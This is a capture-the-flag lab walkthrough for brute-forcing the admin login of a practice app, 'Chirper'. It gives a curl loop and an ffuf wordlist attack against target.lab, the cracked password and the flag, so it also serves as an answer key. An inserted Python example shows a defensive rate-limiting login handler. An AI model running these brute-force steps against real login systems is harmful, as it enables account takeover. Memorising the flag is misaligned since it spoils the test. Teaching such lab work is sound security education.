hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Sign In — Chirper

Broken Authentication · Brute Force / Missing Rate Limiting
Difficulty: Intermediate
Vuln class: Brute Force / Missing Rate Limiting
Steps: 5
// Objective
Brute-force the Chirper admin account password using ffuf or hydra. The login endpoint has no rate limiting, no account lockout, and no CAPTCHA.
// Tools required
ffuf, hydra, curl, Browser
// Step-by-step walkthrough
1. Identify the login endpoint
Open the Chirper login page and submit a test login. Observe the request in DevTools — note the endpoint, method, and body format.
Command / Input
POST /api/login
Content-Type: application/json

{"username":"admin","password":"wrongpassword"}
Output
{"error":"Invalid credentials"}
2. Confirm no rate limiting
Send the same failing request 10 times in rapid succession. If you don't receive a 429 or get locked out, the endpoint is brute-forceable.
Command / Input
for i in {1..10}; do curl -s -X POST http://target.lab/api/login -H "Content-Type: application/json" -d '{"username":"admin","password":"test"}'; echo; done
Output
{"error":"Invalid credentials"} x10 — no lockout, no slowdown.
A hardened login would return 429 after 5 failures, or require a CAPTCHA, or add exponential delay.
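The hardened behaviour described above, as an added example that is not part of the Chirper lab or of this walkthrough: a sliding-window throttle for /api/login that tracks failures per account and per source IP, answers 429 after 5 failures, doubles the retry delay with every further attempt, and never compares the password while throttled. The handler, the in-memory store, the injectable clock and the `verify` callback are all assumptions made for the example.

```python
import time
from collections import defaultdict, deque

MAX_FAILURES = 5      # failures allowed inside the window before the endpoint answers 429
WINDOW_SECONDS = 300  # sliding window over which failures are counted
MAX_DELAY = 300       # cap on the exponential Retry-After value, in seconds

class LoginThrottle:
    """In-memory failure counters keyed per account and per source IP (assumed store, not Chirper's)."""
    def __init__(self, now=time.monotonic):
        self.now = now                      # injectable clock so the behaviour can be tested offline
        self.failures = defaultdict(deque)  # (kind, value) -> timestamps of recent failures

    def _recent(self, key, t):
        q = self.failures[key]
        while q and t - q[0] > WINDOW_SECONDS:  # drop failures that fell out of the window
            q.popleft()
        return len(q)

    def check(self, username, ip):
        """Call before verifying a password. Returns (allowed, retry_after_seconds)."""
        t = self.now()
        worst = max(self._recent(("user", username), t), self._recent(("ip", ip), t))
        if worst < MAX_FAILURES:
            return True, 0
        # Exponential delay: 1 s at the threshold, doubling for every further attempt, capped.
        return False, min(MAX_DELAY, 2 ** (worst - MAX_FAILURES))

    def record(self, username, ip, success):
        t = self.now()
        if success:
            # Clear only the account counter; a valid login must not reset a source IP's history.
            self.failures.pop(("user", username), None)
            return
        self.failures[("user", username)].append(t)
        self.failures[("ip", ip)].append(t)

def handle_login(throttle, verify, username, password, ip):
    """Minimal /api/login handler returning (HTTP status, JSON-style body)."""
    allowed, retry_after = throttle.check(username, ip)
    if not allowed:
        # Blocked attempts are counted too, so hammering the endpoint only lengthens the delay;
        # the password is never compared while the account or the source IP is throttled.
        throttle.record(username, ip, success=False)
        return 429, {"error": "Too many attempts", "retry_after": retry_after}
    ok = verify(username, password)
    throttle.record(username, ip, success=ok)
    if not ok:
        return 401, {"error": "Invalid credentials"}  # same body for unknown user and wrong password
    return 200, {"ok": True}
```

In a real deployment `retry_after` would be sent as the `Retry-After` header and the counters would live in a shared store such as Redis rather than process memory, so that a multi-instance service enforces one limit.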
3. Run ffuf against the password field
Use ffuf with a common password wordlist. Filter out the "Invalid credentials" response by its size so only a successful login shows up.
Command / Input
ffuf -u http://target.lab/api/login \
  -X POST \
  -H "Content-Type: application/json" \
  -d '{"username":"admin","password":"FUZZ"}' \
  -w /usr/share/wordlists/rockyou.txt \
  -fs 26
Output
[Status: 200, Size: 112] chirp123
-fs 26 filters out every response whose body is 26 bytes (the size of the error message), so any response of a different size is a candidate successful login.
4. Log in as admin
Use the discovered password to log in through the normal login form.
Command / Input
Username: admin
Password: chirp123
5. Retrieve the flag from the admin dashboard
Once logged in as admin, navigate to the dashboard. The flag is displayed in the admin panel.
Output
HackrGG{br0k3n_4uth_r4t3_l1m1t_byp4ss}
// Flag
Flag value: HackrGG{br0k3n_4uth_r4t3_l1m1t_byp4ss}
Visible in the Chirper admin dashboard after logging in with the brute-forced password.